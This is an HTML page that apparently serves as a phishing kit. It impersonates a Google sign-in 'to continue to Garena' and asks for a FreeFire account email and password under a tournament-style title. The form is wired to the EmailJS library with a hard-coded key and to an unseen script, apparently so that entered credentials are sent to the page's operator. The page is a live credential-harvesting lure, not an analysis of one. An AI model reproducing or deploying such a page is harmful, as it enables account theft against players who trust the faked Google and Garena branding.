<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Blm tunerment</title>
  <link rel="stylesheet" href="style.css">
  <link rel="icon" href="https://loginpage966.github.io/Login/images.png">
</head>
<body>
  <img src="WhatsApp Image 2025-08-03 at 7.40.55 PM.jpeg"/>
  <div class="login-container">
    <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_light_color_92x30dp.png" alt="Google Logo" class="logo">
    <form id="form">
      <h2>Sign in</h2>
      <p class="subtitle">To Continue To Garena</p>
      <p>Enter Your FreeFire Account<p>
      <div class="field">
        <label for="user_email" class="label">Email</label>
        <input type="text" name="user_email" id="user_email" class="input">
      </div>
      <div class="field">
        <label for="user_password" class="label">Password</label>
        <input type="password" name="user_password" id="user_password" class="input">
      </div>
      <input type="submit" id="button" value="Login" class="login-btn">
    </form>
  </div>
  <script type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
  <script type="text/javascript">
    emailjs.init('Dw-dELOD1gEe0pDgp')
  </script>
  <script src="javascript.js"></script>
</body>
</html>



